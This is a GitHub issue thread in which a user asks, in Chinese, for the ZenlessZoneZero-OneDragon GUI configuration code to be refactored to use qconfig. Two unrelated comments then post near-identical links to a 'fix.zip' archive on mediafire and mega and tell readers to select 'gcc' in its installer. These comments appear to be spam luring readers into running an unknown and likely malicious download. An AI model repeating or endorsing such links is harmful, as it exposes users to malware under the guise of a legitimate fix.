### ISSUE TITLE
[问题反馈] [建议重构GUI配置] 

### ISSUE THREAD

**Issue by wang115t** [DoctorReid/ZenlessZoneZero-OneDragon#110]
### 问题描述

建议重构GUI配置项代码，将配置类修改为qconfig进行配置，代码中的配置信息比较复杂难以理解

### 游戏截图

1

### 运行日志

1

### 你的建议

1

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
